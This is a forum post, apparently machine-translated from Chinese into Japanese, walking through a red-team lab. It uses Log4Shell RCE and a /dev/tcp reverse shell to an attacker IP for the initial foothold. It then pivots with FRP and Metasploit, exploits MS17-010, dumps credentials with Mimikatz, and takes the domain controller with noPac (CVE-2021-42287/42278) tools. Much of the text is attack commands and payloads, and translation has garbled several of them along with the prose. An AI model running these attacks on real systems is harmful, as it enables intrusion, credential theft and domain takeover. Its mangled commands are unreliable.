Jump to content

タイトル:外部ネットワークlog4J2 RCEから内部ネットワークの組み合わせ拳拳抜け穴CVE-2021-42287、CVE-2021-42278 Get DC

HireHackking

By HireHackking in HACKER

· 1 view

ネットワークトポロジー

1049983-20230224112439293-1629704471.png

情報収集

侵入テストの最初のステップはもちろん情報収集です

IP192.168.81.151を取得し、最初にNMAPを使用して通常のTCPポートをスキャンします。

NMAP -V -PN -T3 -SV -N -ST-OPEN -P 22,1222,222,222345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,500 0,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080,38080. 192.168.81.151

2つのポート22,38080が開いていることがわかりました

1049983-20230224112440302-161893427.png

NMAPを通じて、これはUbuntuであり、22はSSHであり、ポート38080は不明であることがわかります。アクセスしてみましょう。

1049983-20230224112441015-1606254674.png

そこで、最新の新しい脆弱性CVE-2021-44228を試して、dnslogを取得できるかどうかを確認しました

1049983-20230224112441754-989805708.png

CVE-2021-44228の脆弱性が見つかりました。シェルを取得してみてください

CVE-2021-44228利用

VPS Kali(192.168.81.133)でLDAPを最初に有効にします:

git clone 3https://github.com/black9/log4shell_jndiexploit.git

Java -jar jndiexploit -1.2 -snapshot.jar -i 192.168.81.133

1049983-20230224112442401-1799288793.png

その後、Kaliの9999ポートで聞いてください。

1049983-20230224112443129-1120562669.png

リバウンドシェルにはtomcatbypassを使用します

1049983-20230224112443857-1816671400.png

/bin/bash -i /dev/tcp/192.168.210.23/9999 01 -Bounce Shell

リバウンドシェルコマンドには、base64エンコーディングが必要です

1049983-20230224112444657-150046970.jpg

BPパケットキャプチャ、パラメーター送信の投稿への変更、ペイロードの構築

ペイロード=$ {jndi3:ldap3360 //192.168.81.1:1389/tomcatbypass/command/base64/ymfzaCatasa+jiavzgv2l3rjcc8xotiumty4ljgxljezmy85otk5ida+jje+

最後に、EXPを使用してシェルを正常にリバウンドします。 base64エンコードを実行するために2回Encodingを実行する必要があります

1049983-20230224112445349-1880270644.png

1049983-20230224112446035-2093462483.png

私が手に入れたシェルはDockerコンテナであることがわかりました

私は逃げる方法を見つけられず、最終的に/root /ディレクトリでフラグファイルを見つけました。

1049983-20230224112446659-1582184670.png

flag {redteam.lab-1}おめでとうございます、あなたはこの: Saul Saul123を手に入れました

フラグがあり、アカウントのパスワードに似たものがありました

情報収集中、NMAPはターゲットホストにスキャンして22SSHサービスを開きますので、SSHになる可能性のあるアカウントパスワードについて考えてください

イントラネット情報コレクション

前のセクションで取得したアカウントとパスワードを介してUbuntuシステムにログイン

1049983-20230224112447319-361521344.png

現在のマシンには2つのネットワークカードがあり、1つは外部ネットワークをリンクするために使用され、もう1つのENS38がイントラネットの通信に使用されていることがわかります。

1049983-20230224112448090-1276995160.png

実際のイントラネットの浸透:イントラネットの浸透がLinux環境にある場合は、Linuxが完全に構築されているため、すべてのバッシュとPythonizationを形成してみてください。外部ツールにあまり頼らないようにしてください。

したがって、ENS38のCセグメントネットワークをpingするには、for loopを使用します

10.0.1。{1.254}のIの場合ping -c 3 -w 3 $ i /dev /nullの場合は行います。次に、echo $はターゲットを見つけます。 fi;終わり

1049983-20230224112449171-1244750120.png

イントラネットに別のマシン10.0.1.7があることがわかりました

または、スキャン情報ツールを使用して、イントラネット情報を収集します

KaliでPythonを使用してHTTPDをすばやく構築します

在这里插入图片描述

ターゲットマシンのダウンロードツールと付与権限

在这里插入图片描述

イントラネット情報を収集します

在这里插入图片描述

10.0.1.7は生き残ることがわかっており、MS17-010で存在していました

その後、便利なため、FRPを使用して現在のマシンのトラフィックをプロキシすることにしました。

frps.iniを構成します

1049983-20230224112453151-2127359350.png

frpc.iniを構成します

1049983-20230224112453875-703136445.png

次に、Metasploitを使用してSocks5をセットアップして、イントラネットに関する詳細な情報を収集します。

setg Proxies socks5:192.168.81.13:8888setg ReverseAllowProxy true

1049983-20230224112454590-999174959.png

SMBバージョン検出モジュールを使用して、ターゲットをスキャンします。

補助/スキャナー/SMB/SMB_Versionを使用します

1049983-20230224112455381-1095096075.png

ターゲットバージョン10.0.1.7はWindows 7であり、ドメインRedTeamが存在することがわかりました。

Windows7であるため、MS17-010の脆弱性がある可能性があります

MS17-010利用

前のセクションを通じて、10.0.1.7がWin7であることがわかり、その後、検出を実施します。

1049983-20230224112456243-449342750.png

検出を通じて、このマシンにMS17-010の脆弱性があることがわかりました。

ターゲットは、イントラネットが必ずしもネットワークを離れるわけではないため、TCP反射接続を使用できません。フォワードbind_tcpにペイロードするように設定します

1049983-20230224112457059-1616668651.png

1049983-20230224112458087-1589219523.png

win7アクセス許可を直接取得し、mimikatazをロードしてパスワードを取得します

ユーザー名ドメインパスワードルートレッドチームRED12345METERPRETER LOADMIMIKATZロードツール

MeterPreter Creds_Allはクレジットをリストします

コマンドは、メモリからパスワードを取得することであり、射撃範囲の元の状態が一時停止され、復元されることに注意してください。再起動する場合は、Win7に1回ログインする必要があります。

1049983-20230224112459386-400238020.png

この時点で、ドメインユーザーのアカウントを取得しました。

イントラネット武器CVE-2021-42287、CVE-2021-42278

現在のイントラネットに関する情報を収集した後、Win7にはイントラネットネットワークカードもあることがわかりました。

1049983-20230224112500181-544535760.png

1049983-20230224112500885-1700250183.png

ドメインコントロールからドメインコントロールへのIPアドレスは10.0.0.12です

1049983-20230224112501591-641415294.png

2つのドメインの脆弱性が最近公開されているため、CVE-2021-42287およびCVE-2021-42278は、それらを直接搾取しようとします。

特定の原則は、ドメインにドメインコントロール名DCがある場合(ドメインコントロールに対応するマシンユーザーはDC)、攻撃者は脆弱性CVE-2021-42287を使用してマシンユーザーSaulgoodmanを作成し、MachineユーザーのSamacountnameをDCに変更します。次に、DCを使用してTGT請求書を申請します。次に、DC SamacCountNameをSamacCountNameに変更します。現時点では、KDCはドメインにDCとこのユーザーが存在しないことを判断し、DCを自動的に検索します(DCはドメインに既にドメインに既に制御されたDCのSamacCountNameです)。攻撃者は、S4U2Selfに適用したばかりのTGTを使用し、ドメイン内のドメインマネージャーをシミュレートしてドメイン制御DCのSTチケットを要求し、最後にドメインコントローラーDCの権限を取得します。

したがって、MSFを使用してSocks5を追加します

1049983-20230224112502321-1486248533.png

ルートを追加します

Autoroute -S 10.0.0.7/24を実行します

1049983-20230224112503034-1970568292.png

次に、ローカルプロキシを追加するだけです

1049983-20230224112503650-1212863661.png

ツールを使用してアドレスをダウンロードします

https://github.com/wazehell/sam-the-admin

https://github.com/ridter/nopac

https://github.com/waterrr/nopac

次に、スクリプトを使用します

proxychains python3 sam_the_admin.py 'redteam.lab/root:red12345' -dc -ip 10.0.0.12 -shell proxychains python nopac.py redteam.lab/root3:'red12345 '-dc -0.0.0.0.0.0.0.0.0.0.0.0.0.0.0. -use -ldapproxychains python3 exp.py 'redteam/root:red12345' -dc -ip 10.0.0.12 -shell

1049983-20230224112504432-1322113048.png

最後に、私は最終フラグを取得しました。

1049983-20230224112505200-132523298.png

ターゲットマシン環境:リンク: https://pan.baidu.com/s/18pxdc2ff_zdsxonpsug1fyg抽出コード: 8dcyオリジナルリンク: http://WWW.KRYST4L.CN/2021/12/22/%E4%BB%8E%E5%A4%96%E7%BD%91-LOG4J2-RCE-%A5%86%8D%E5%88%B0%E5%86歳%E5%BC%B9%E7%BB%84%E5%90%88%E6%8B%B3%E6%BC%8F%E6%E3%9E-CVE-2021-42287%

  • 0 Comments

    Recommended Comments

    There are no comments to display.

    Guest
    Add a comment...